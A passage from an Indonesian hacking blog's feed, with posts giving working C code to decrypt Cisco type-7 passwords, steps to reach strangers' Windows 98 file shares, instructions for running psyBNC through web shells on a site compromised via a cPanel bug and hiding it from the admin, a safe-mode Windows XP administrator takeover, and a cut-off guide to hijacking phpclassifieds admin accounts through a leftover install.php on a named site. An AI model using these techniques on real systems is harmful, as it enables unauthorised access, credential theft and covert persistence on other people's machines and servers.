/&gt; &lt;br /&gt;                        if(line[i] == '\n')&lt;br /&gt;                                break;&lt;br /&gt;                }&lt;br /&gt;                pw_pos = 0;&lt;br /&gt;                line[i] = 0;&lt;br /&gt; &lt;br /&gt;                if(!strncmp(line, pw_str1, strlen(pw_str1)))&lt;br /&gt;                        pw_pos = strlen(pw_str1);&lt;br /&gt; &lt;br /&gt;                if(!strncmp(line, pw_str2, strlen(pw_str2)))&lt;br /&gt;                        pw_pos = strlen(pw_str2);&lt;br /&gt; &lt;br /&gt;                if(!pw_pos) {&lt;br /&gt;                        fprintf(stdout, "%s\n", line);&lt;br /&gt;                        continue;&lt;br /&gt;                }&lt;br /&gt; &lt;br /&gt;                if(cdecrypt(&amp;line[pw_pos], passwd)) {&lt;br /&gt;                        fprintf(stderr, "Error.\n");&lt;br /&gt;                        exit(1);&lt;br /&gt;                }&lt;br /&gt;                else {&lt;br /&gt;                        if(pw_pos == strlen(pw_str1))&lt;br /&gt;                                fprintf(out, "%s", pw_str1);&lt;br /&gt;                        else&lt;br /&gt;                                fprintf(out, "%s", pw_str2);&lt;br /&gt; &lt;br /&gt;                        fprintf(out, "%s\n", passwd);&lt;br /&gt;                }&lt;br /&gt;        }&lt;br /&gt;}&lt;br /&gt; &lt;br /&gt; &lt;br /&gt; &lt;br /&gt; &lt;br /&gt;Selamat mencoba moga2 berguna buat temen.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-8882699389363957068?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/8882699389363957068/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=8882699389363957068' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/8882699389363957068'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/8882699389363957068'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/hack-ftp.html' title='Hack FTP'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-9076525185527603217</id><published>2007-03-31T04:17:00.001+07:00</published><updated>2007-03-31T04:17:21.068+07:00</updated><title type='text'>Hacking Cisco</title><content type='html'>#include &lt;br /&gt;#include &lt;br /&gt;&lt;br /&gt; char xlat[] = {&lt;br /&gt;        0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,&lt;br /&gt;        0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,&lt;br /&gt;        0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44&lt;br /&gt;};&lt;br /&gt; &lt;br /&gt;char pw_str1[] = "password 7 ";&lt;br /&gt;char pw_str2[] = "enable-password 7 ";&lt;br /&gt; &lt;br /&gt;char *pname;&lt;br /&gt; &lt;br /&gt;cdecrypt(enc_pw, dec_pw)&lt;br /&gt;char *enc_pw;&lt;br /&gt;char *dec_pw;&lt;br /&gt;{&lt;br /&gt;        unsigned int seed, i, val = 0;&lt;br /&gt; &lt;br /&gt;        if(strlen(enc_pw) &amp; 1)&lt;br /&gt;                return(-1);&lt;br /&gt; &lt;br /&gt;        seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';&lt;br /&gt; &lt;br /&gt;        if (seed &gt; 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))&lt;br /&gt;                return(-1);&lt;br /&gt; &lt;br /&gt;        for (i = 2 ; i &lt;= strlen(enc_pw); i++) {&lt;br /&gt;                if(i !=2 &amp;&amp; !(i &amp; 1)) {&lt;br /&gt;                        dec_pw[i / 2 - 2] = val ^ xlat[seed++];&lt;br /&gt;                        val = 0;&lt;br /&gt;                }&lt;br /&gt; &lt;br /&gt;                val *= 16;&lt;br /&gt; &lt;br /&gt;                if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {&lt;br /&gt;                        val += enc_pw[i] - '0';&lt;br /&gt;                        continue;&lt;br /&gt;                }&lt;br /&gt; &lt;br /&gt;                if(enc_pw[i] &gt;= 'A' &amp;&amp; enc_pw[i] &lt;= 'F') {&lt;br /&gt;                        val += enc_pw[i] - 'A' + 10;&lt;br /&gt;                        continue;&lt;br /&gt;                }&lt;br /&gt; &lt;br /&gt;                if(strlen(enc_pw) != i)&lt;br /&gt;                        return(-1);&lt;br /&gt;        }&lt;br /&gt; &lt;br /&gt;        dec_pw[++i / 2] = 0;&lt;br /&gt; &lt;br /&gt;        return(0);&lt;br /&gt;}&lt;br /&gt; &lt;br /&gt;usage()&lt;br /&gt;{&lt;br /&gt;        fprintf(stdout, "Usage: %s -p \n", pname);&lt;br /&gt;        fprintf(stdout, "       %s  \n", pname);&lt;br /&gt; &lt;br /&gt;        return(0);&lt;br /&gt;}&lt;br /&gt; &lt;br /&gt;main(argc,argv)&lt;br /&gt;int argc;&lt;br /&gt;char **argv;&lt;br /&gt; &lt;br /&gt;{&lt;br /&gt;        FILE *in = stdin, *out = stdout;&lt;br /&gt;        char line[257];&lt;br /&gt;        char passwd[65];&lt;br /&gt;        unsigned int i, pw_pos;&lt;br /&gt; &lt;br /&gt;        pname = argv[0];&lt;br /&gt; &lt;br /&gt;        if(argc &gt; 1)&lt;br /&gt;        {&lt;br /&gt;                if(argc &gt; 3) {&lt;br /&gt;                        usage();&lt;br /&gt;                        exit(1);&lt;br /&gt;                }&lt;br /&gt; &lt;br /&gt;                if(argv[1][0] == '-')&lt;br /&gt;                {&lt;br /&gt;                        switch(argv[1][1]) {&lt;br /&gt;                                case 'h':&lt;br /&gt;                                usage();&lt;br /&gt;                                break;&lt;br /&gt; &lt;br /&gt;                                case 'p':&lt;br /&gt;                                if(cdecrypt(argv[2], passwd)) {&lt;br /&gt;                                        fprintf(stderr, "Error.\n");&lt;br /&gt;                                        exit(1);&lt;br /&gt;                                }&lt;br /&gt;                                fprintf(stdout, "password: %s\n", &lt;br /&gt;passwd);&lt;br /&gt;                                break;&lt;br /&gt; &lt;br /&gt;                                default:&lt;br /&gt;                                fprintf(stderr, "%s: unknow option.", &lt;br /&gt;pname);&lt;br /&gt;                        }&lt;br /&gt; &lt;br /&gt;                        return(0);&lt;br /&gt;                }&lt;br /&gt; &lt;br /&gt;                if((in = fopen(argv[1], "rt")) == NULL)&lt;br /&gt;                        exit(1);&lt;br /&gt;                if(argc &gt; 2)&lt;br /&gt;                        if((out = fopen(argv[2], "wt")) == NULL)&lt;br /&gt;                                exit(1);&lt;br /&gt;        }&lt;br /&gt; &lt;br /&gt;        while(1) {&lt;br /&gt;                for(i = 0; i &lt; 256; i++) {&lt;br /&gt;                        if((line[i] = fgetc(in)) == EOF) {&lt;br /&gt;                                if(i)&lt;br /&gt;                                        break;&lt;br /&gt; &lt;br /&gt;                                fclose(in);&lt;br /&gt;                                fclose(out);&lt;br /&gt;                                return(0);&lt;br /&gt;                        }&lt;br /&gt;                        if(line[i] == '\r')&lt;br /&gt;                                i--;&lt;br /&gt; &lt;br /&gt;                        if(line[i] == '\n')&lt;br /&gt;                                break;&lt;br /&gt;                }&lt;br /&gt;                pw_pos = 0;&lt;br /&gt;                line[i] = 0;&lt;br /&gt; &lt;br /&gt;                if(!strncmp(line, pw_str1, strlen(pw_str1)))&lt;br /&gt;                        pw_pos = strlen(pw_str1);&lt;br /&gt; &lt;br /&gt;                if(!strncmp(line, pw_str2, strlen(pw_str2)))&lt;br /&gt;                        pw_pos = strlen(pw_str2);&lt;br /&gt; &lt;br /&gt;                if(!pw_pos) {&lt;br /&gt;                        fprintf(stdout, "%s\n", line);&lt;br /&gt;                        continue;&lt;br /&gt;                }&lt;br /&gt; &lt;br /&gt;                if(cdecrypt(&amp;line[pw_pos], passwd)) {&lt;br /&gt;                        fprintf(stderr, "Error.\n");&lt;br /&gt;                        exit(1);&lt;br /&gt;                }&lt;br /&gt;                else {&lt;br /&gt;                        if(pw_pos == strlen(pw_str1))&lt;br /&gt;                                fprintf(out, "%s", pw_str1);&lt;br /&gt;                        else&lt;br /&gt;                                fprintf(out, "%s", pw_str2);&lt;br /&gt; &lt;br /&gt;                        fprintf(out, "%s\n", passwd);&lt;br /&gt;                }&lt;br /&gt;        }&lt;br /&gt;}&lt;br /&gt; &lt;br /&gt; &lt;br /&gt; &lt;br /&gt; &lt;br /&gt;Selamat mencoba moga2 berguna buat temen.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-9076525185527603217?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/9076525185527603217/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=9076525185527603217' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/9076525185527603217'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/9076525185527603217'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/hacking-cisco.html' title='Hacking Cisco'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-3504945889335064992</id><published>2007-03-31T04:16:00.001+07:00</published><updated>2007-03-31T04:16:39.411+07:00</updated><title type='text'>Hack Windows 98</title><content type='html'>1. Ok, first check to see that you have all of the necessary files.&lt;br /&gt;Here they are, these should be in the control panel (start, run, control panel, network).&lt;br /&gt;&lt;br /&gt;1. NetBEUI&lt;br /&gt;2. TCP/IP&lt;br /&gt;3. IPX/SPX &lt;br /&gt;4. Client for Microsoft Networks&lt;br /&gt;5. File Sharing for Microsoft &lt;br /&gt;&lt;br /&gt;Of course you will also have a dial up adapter or an ethernet adapter based on&lt;br /&gt;your network topology.&lt;br /&gt;&lt;br /&gt;Ok, now that you have all that installed, you can check out remote computers.&lt;br /&gt;Windows 95 is very limited in the ways you can attack remote hosts. After many&lt;br /&gt;long hours I figured out a way that always works. Ok, so first get an IP. These&lt;br /&gt;are easy to get. You can go on IRC and just /whois people or you can use Legion, just&lt;br /&gt;check a search engine to check a bunch of IP's with filesharing enabled.&lt;br /&gt;&lt;br /&gt;Ok, so now that you have an IP, try this...&lt;br /&gt;&lt;br /&gt;&lt;C:\WINDOWS&gt;nbtstat -A 123.456.789.1 (Fill in actual IP)&lt;br /&gt;Netbios Name&lt;br /&gt;^&lt;br /&gt;SHARE   &lt;00&gt;    &lt;br /&gt;SHARE   &lt;20&gt; That's what we want!&lt;br /&gt;FILE    &lt;1b&gt;&lt;br /&gt;&lt;br /&gt;and so on..&lt;br /&gt;&lt;br /&gt;If they have the 20 there that means that they might be vulnerable. So,&lt;br /&gt;go to start, programs, accessories, notepad. Then, go to start, run,&lt;br /&gt;c:\windows. Then click and drag the lmhosts (exactly lmhosts, not lmhosts.sam. Check&lt;br /&gt;winfile for extension) into the notepad. Add the following. So, we have our IP and netbiosname&lt;br /&gt;&lt;br /&gt;123.456.789.1   SHARE   #PRE&lt;br /&gt;&lt;br /&gt;Then, click on File, Save. Then from MS-DOS prompt type&lt;br /&gt;&lt;br /&gt;&lt;C:\WINDOWS&gt;nbtstat -R                  &lt;-- to refresh netbios&gt;&lt;br /&gt;&lt;br /&gt;Then, go to start, find, computer and enter the netbiosname of the&lt;br /&gt;computer of the IP you have. If it finds it, that means that it has&lt;br /&gt;filesharing on it, if you get a password prompt, you can try but I wouldn't&lt;br /&gt;suggest it. Many computers don't have password protection. So, this was really&lt;br /&gt;brief but it works, and that's what matters.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-3504945889335064992?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/3504945889335064992/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=3504945889335064992' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/3504945889335064992'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/3504945889335064992'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/hack-windows-98.html' title='Hack Windows 98'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-7976394757492802518</id><published>2007-03-31T04:15:00.001+07:00</published><updated>2007-03-31T04:15:34.665+07:00</updated><title type='text'>Install 2 OS</title><content type='html'>1. saya asumsikan bahwa komputer anda sudah terinstalasi windows 98 (win 2000) dengan baik,     apa bila belum maka bapak dapat menginstalnya terlebih dahulu.&lt;br /&gt;&lt;br /&gt;2. bila windows 98 sudah terinstal, maka ada baiknya bapak sudah memback-up semua data    bapak, kalau-kalau terjadi kesalahan dalam mempartisi, karena kita masih sam-sama belajar,    jadi pada awalnya kita harus membuat pencegahan.&lt;br /&gt;3. kemudian installah partition magic 7.0 (ada dalam : pc shop 2002, pc shop 121, pc shop    2003)pada komputer bapak. dari sinilah kita memulai partisi dari hardisk tersebut.&lt;br /&gt;4.setelah partition magic tadi sudah terinstal (diasumsikan bahwa tidak ada masalah pada saat    anda mengFDISK komputer bapak), dalam hardisk bapak terbagi dua c:/ dan d:/, maka kita    buat new partition pada hardisk bapak tersebut, kemudian kita bisa memilihnya , ada linux dan    lain-lain (baca semua instruksinya, dan ikuti semua keterangan yang "recomended").&lt;br /&gt;   setelah partisi untuk linux dan swap-nya sudah di buat, maka bapak dapat merestart komputer    bapak, dan selanjutnya partition maic yan akan bekerja untuk membagi harddisk tersebut.&lt;br /&gt;5. (diasumsikan bahwa hardisk tsb telah terpartisi), maka bapak dapat merestart kembali dan     kemudian mengset bios agar dapat booting dari cd-rom. lalu bapak masukan linux redhat 7.3      dan mulailah untuk menginstalnya. bapak dapat menggunakan yang graphic mode agar lebih          mudah dalam penginstalan.&lt;br /&gt;6. setelah itu anda tinggal next, kemudian tibalah pada language bapak dapat memilih English next     lagi, installation type bapak pilih workstation,  kemudian disk partitioning setup, bapak pilih        “have the installer automatically partition for you”.&lt;br /&gt;7. tiba pada “Automatic Partitioning” bapak pilih keep all partition and use existing free space     kemudian next, bila ada pilihan (pilih OK).&lt;br /&gt;8. tiba pada disk setup : klik di table dibawah yang memunyai mount = / (garis miring) kemudian di     next lalu (OK).&lt;br /&gt;9. boot loade configuration : bapak dapat memilih GRUB, terserah apabila mau memilih lilo, tapi     kemarin saya memakai grub dan tidak bermasalah. kemudian klik di boot image nya pilih  boot     label DOS. Lalu tinggal next, dan selanjutnya untuk instalasi yang lain mungkin bapak bisa         lanjutkan sendiri. Karena semua  yang berhubungan dengan setting dual OS sudah lewat.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-7976394757492802518?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/7976394757492802518/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=7976394757492802518' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/7976394757492802518'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/7976394757492802518'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/install-2-os.html' title='Install 2 OS'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-2822282864431835355</id><published>2007-03-31T04:14:00.001+07:00</published><updated>2007-03-31T04:14:51.505+07:00</updated><title type='text'>Install psyBNC &amp; Eggdrop di cpanel bug</title><content type='html'>kebiasaan hacker hacker kita mencari rooting adalah untuk membuat bot eggdrop atau membuat psybnc. Namun saya beranggapan bhw kebanyakan teman teman sekalian kebingungan cara sehingga banyaklah situs situs yang di deface. &lt;br /&gt;&lt;br /&gt;apakah kita bisa install psybnc di cpanel bug ?&lt;br /&gt;&lt;br /&gt;lebih lanjut...&lt;br /&gt;1. saya anggap bhw anda sudah berhasil melakukan upload ke dalam situs yang anda ambil lewat cpanel bug. Bila anda belum paham, silahkan anda baca tutorial tentang mengexplorasi cpanel &lt; 5.3 di tulisan sebelumnya. &lt;br /&gt;&lt;br /&gt;2. Upload ke dalam situs tersebut file yang bisa sebagai mediator seperti layaknya shell. Beberapa file yang bisa dijadikan mediator antara lain cgitelnet.pl, myshell.php, phpshell.php. &lt;br /&gt;&lt;br /&gt;3. Bekerjalah di mediator tersebut. &lt;br /&gt;&lt;br /&gt;4. Saat bekerja dengan mediator tersebut perlu anda ingat bhw kita bekerja di port 80 dengan notabene bhw anda adalah nobody (id) sehingga kita tdk bisa melakukan apapun di dalamnya. Namun kita bisa bekerja di wilayah /tmp/. Pindahlah ke folder /tmp/ dan selanjutnya bekerjalah diruang lingkup tersebut. &lt;br /&gt;&lt;br /&gt;5. Proses instalasi psyBNC tidak akan saya jelaskan disini, karena saya anggap bhw anda sudah mahir. namun yang jadi sering kendala adalah saat mengganti port psyBNC tersebut. &lt;br /&gt;&lt;br /&gt;6. Untuk melakukan editing port yaitu dengan menggunakan command echo. pertama adalah lakukan cat psybnc.conf &lt;br /&gt;PSYBNC.SYSTEM.PORT1=31337 &lt;br /&gt;PSYBNC.SYSTEM.HOST1=* &lt;br /&gt;PSYBNC.HOSTALLOWS.ENTRY0=*;* &lt;br /&gt;&lt;br /&gt;Tentunya anda perlu buat ganti port tersebut. &lt;br /&gt;ketiklah sebagai berikut untuk mengganti portnya &lt;br /&gt;&lt;br /&gt;echo PSYBNC.SYSTEM.PORT1=5000 &gt; psybnc.conf ; echo "PSYBNC.SYSTEM.HOST1=*" &gt;&gt; psybnc.conf ; echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" &gt;&gt; psybnc.conf &lt;br /&gt;&lt;br /&gt;sehingga kita mendapatkan port baru yaitu port 5000 &lt;br /&gt;&lt;br /&gt;7. selanjutnya tinggal running ./psybnc dan saya sarankan anda buat menggunakan program fake untuk menghindari adminnya.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-2822282864431835355?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/2822282864431835355/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=2822282864431835355' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/2822282864431835355'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/2822282864431835355'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/install-psybnc-eggdrop-di-cpanel-bug.html' title='Install psyBNC &amp; Eggdrop di cpanel bug'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-4465771099482961018</id><published>2007-03-31T04:13:00.000+07:00</published><updated>2007-03-31T04:14:07.270+07:00</updated><title type='text'>Jebol Password WIN XP</title><content type='html'>Mohon Maaf jika tulisan saya belepotan. Oke kita lanjut saja......&lt;br /&gt;Pernah seorang teman menanyakan kepada saya, seperti ini...&lt;br /&gt;Saya ndak bisa masuk sebagai administrator dalam komputer saya karena saya lupa&lt;br /&gt;ama passwordnya. Tolong kasi tau dong gemana cara menghacknya...Lalu saya teringat &lt;br /&gt;akan ulah saya yang suka iseng ama yang namanya komputer, hal itu saya lakukan &lt;br /&gt;pada sebuah warnet yang suka membatasi usernya biar tidak bisa menginstal program &lt;br /&gt;aneh.&lt;br /&gt;&lt;br /&gt;Hehehehehe... akhirnya saya terpikir untuk menerbitkan tulisan ini karena menurut&lt;br /&gt;saya bisa nambah ilmu buat mereka yang baru mengenal komputer dan windows xp &lt;br /&gt;tentunya.&lt;br /&gt;&lt;br /&gt;Oke deh kita lihat langkah-langkahnya satu persatu &lt;br /&gt;eng ing eng.....&lt;br /&gt;&lt;br /&gt;Pertama    : Hidupkan kompimu (bahasa gaulnya = komputer)&lt;br /&gt;Kedua    : Jika sudah, tekan F8. Maka kamu akan di bawa ke mode "safe &lt;br /&gt;mode"&lt;br /&gt;             tunggu beberapa menit&lt;br /&gt;Ketiga    : Tekan Ctrl + alt + Del Maka akan muncul form Login dan Password&lt;br /&gt;Keempat    : Isi login dengan Administrator serta passwordnya terserah anda&lt;br /&gt;             pokoknya passwordnya mudah di ingat oleh anda sendiri&lt;br /&gt;Kelima    : Jika telah melakukan hal di atas, restart kembali komputer anda&lt;br /&gt;Keenam    : Pilihlah start in normaly windows kalo ngga salah heheheh&lt;br /&gt;Ketujuh    : Tekan kembali Ctrl + Alt + Del &lt;br /&gt;Kedelapan  : Ketikkan nama loginnya Administrator terus password yang baru anda &lt;br /&gt;      ubah tadi&lt;br /&gt;Kesembilan : Lihat apa yang terjadi, anda telah menjadi administrator di Kompi anda &lt;br /&gt;Kesepuluh  : Selesai......terserah anda mau lakukan apasaja &lt;br /&gt;&lt;br /&gt;Semua langkah di atas sudah penulis coba dan hasilnya super manjur dan tidak &lt;br /&gt;tertandingi&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-4465771099482961018?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/4465771099482961018/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=4465771099482961018' title='12 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/4465771099482961018'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/4465771099482961018'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/jebol-password-win-xp.html' title='Jebol Password WIN XP'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>12</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-8512574336242749933</id><published>2007-03-31T04:12:00.001+07:00</published><updated>2007-03-31T04:12:52.694+07:00</updated><title type='text'>Jenis Jenis Serangan</title><content type='html'>Dalam dunia hacking (tepatnya cracking ding!?) dikenal beberapa jenis serangan terhadap&lt;br /&gt;server. Berikut ini jenis-jenis serangan dasar yang dapat dikelompokkan dalam minimal 6&lt;br /&gt;kelas, yaitu:&lt;br /&gt;&lt;br /&gt;Intrusion&lt;br /&gt;---------&lt;br /&gt;Pada jenis serangan ini seorang cracker (umumnya sudah level hacker) akan dapat&lt;br /&gt;menggunakan sistem komputer server. Serangan ini lebih terfokus pada full access granted&lt;br /&gt;dan tidak bertujuan merusak. Jenis serangan ini pula yg diterapkan oleh para hacker untuk&lt;br /&gt;menguji keamanan sistem jaringan mereka. Dilakukan dalam beberapa tahap dan tidak dalam&lt;br /&gt;skema kerja spesifik pada setiap serangannya (dijelaskan pada artikel lain). &lt;br /&gt;Hacking is an Art!? =)&lt;br /&gt;&lt;br /&gt;Denial of Services (DoS)&lt;br /&gt;------------------------&lt;br /&gt;Penyerangan pada jenis DoS mengakibatkan layanan server mengalami stuck karena kebanjiran&lt;br /&gt;request oleh mesin penyerang. Pada contoh kasus Distributed Denial of Services (DDoS)&lt;br /&gt;misalnya; dengan menggunakan mesin-mesin zombie, sang penyerang akan melakukan packeting&lt;br /&gt;request pada server secara serentak asimetris dan simultan sehingga buffer server akan&lt;br /&gt;kelabakan menjawabnya!? Stuck/hung akan menimpa server. Jadi bukan server lagi namanya!?&lt;br /&gt;(servicenya mati masak dibilang server? hehehe....)&lt;br /&gt;&lt;br /&gt;Joyrider&lt;br /&gt;--------&lt;br /&gt;Nah, ini namanya serangan iseng!? Karena kebanyakan baca novel-novel hacking dan gak bisa&lt;br /&gt;belajar benar, isenglah jadinya nyoba-nyoba nyerang pake ilmu-ilmu instan super cepat&lt;br /&gt;(istilahnya 'onani' dimesin orang). Atau dengan alasan pengen tau isinya mesin orang!? =).&lt;br /&gt;Yang jelas serangan jenis ini rata-rata karena rasa ingin tau, tapi ada juga yang sampe&lt;br /&gt;menyebabkan kerusakan atau kehilangan data.&lt;br /&gt;&lt;br /&gt;Vandal&lt;br /&gt;------&lt;br /&gt;Jenis serangan spesialis pengrusak!? nothing else to explain mbah!? =)&lt;br /&gt;&lt;br /&gt;Scorekeeper&lt;br /&gt;-----------&lt;br /&gt;Serangan yang bertujuan mencapai reputasi hasil cracking terbanyak. Biasanya hanya&lt;br /&gt;berbentuk deface halaman web (index/nambah halaman) dengan memampangakan NickName dan&lt;br /&gt;kelompok tertentu. Sebagian besar masih tidak perduli dengan isi mesin sasarannya =). &lt;br /&gt;Saat ini jenis penyerang ini lebih dikenal dengan sebutan WannaBe/Script kiddies.&lt;br /&gt;&lt;br /&gt;Spy&lt;br /&gt;---&lt;br /&gt;Tiga hurup saja. Jenis serangan untuk memperoleh data atau informasi rahasia dari mesin&lt;br /&gt;target. Biasanya menyerang pada mesin-mesin dengan aplikasi database didalamnya. Kadang&lt;br /&gt;kala suatu perusahaan menyewa 'mata-mata' untuk mencuri data perusahaan rivalnya!? Mau&lt;br /&gt;coba Pak? =)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-8512574336242749933?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/8512574336242749933/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=8512574336242749933' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/8512574336242749933'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/8512574336242749933'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/jenis-jenis-serangan.html' title='Jenis Jenis Serangan'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-4775779029006634103</id><published>2007-03-31T04:11:00.000+07:00</published><updated>2007-03-31T04:12:02.123+07:00</updated><title type='text'>KUDETA</title><content type='html'>Ini sebenarnya bukanlah bug dari phpclassifieds tapi merupakan kesalahan sang admin yg tidak menghapus file install.php pada phpclassifieds, sehingga kita dapat mengambil alih password adminnya.&lt;br /&gt;&lt;br /&gt;lebih lanjut...&lt;br /&gt;Sekarang kita mulai aja aksi kudeta admin pada phpclassifieds, yg di butuhkan untuk kudeta ini tidak menuntut banyak persyaratan,... :) , langkah-langkahnya adalah sebagai berikut : &lt;br /&gt;&lt;br /&gt;1. Cari web yg menggunakan phpclassifieds sebagai forumnya dengan cara search di search engine favorit kamu (kalo aku lebih suka memakai google, karena google itu selain hebat juga punya om aku :P~) dengan keyword phpclassifieds. Wowww banyak banget hasilnya : Results 1 - 10 of about 11,400. Search took 0.07 seconds (sumber : google.com).&lt;br /&gt;&lt;br /&gt;2. Setelah dapat buka di browser alamat url phpclassifieds dan di tambahkan install.php, ex : http://www.mediabd.com/phpclassifieds/install.php &lt;br /&gt;Kalau url tersebut menunjukkan step bye step instalasi phpclassifieds kita dapat mengkudetanya, tapi Kalau terjadi error 404 ato alamat tidak di temukan berarti file install.php telah di hapus oleh adminnya sehingga kita tidak dapat mengkudetanya.&lt;br /&gt;&lt;br /&gt;3. Langsung aja lompat ke langkah 4 dari step 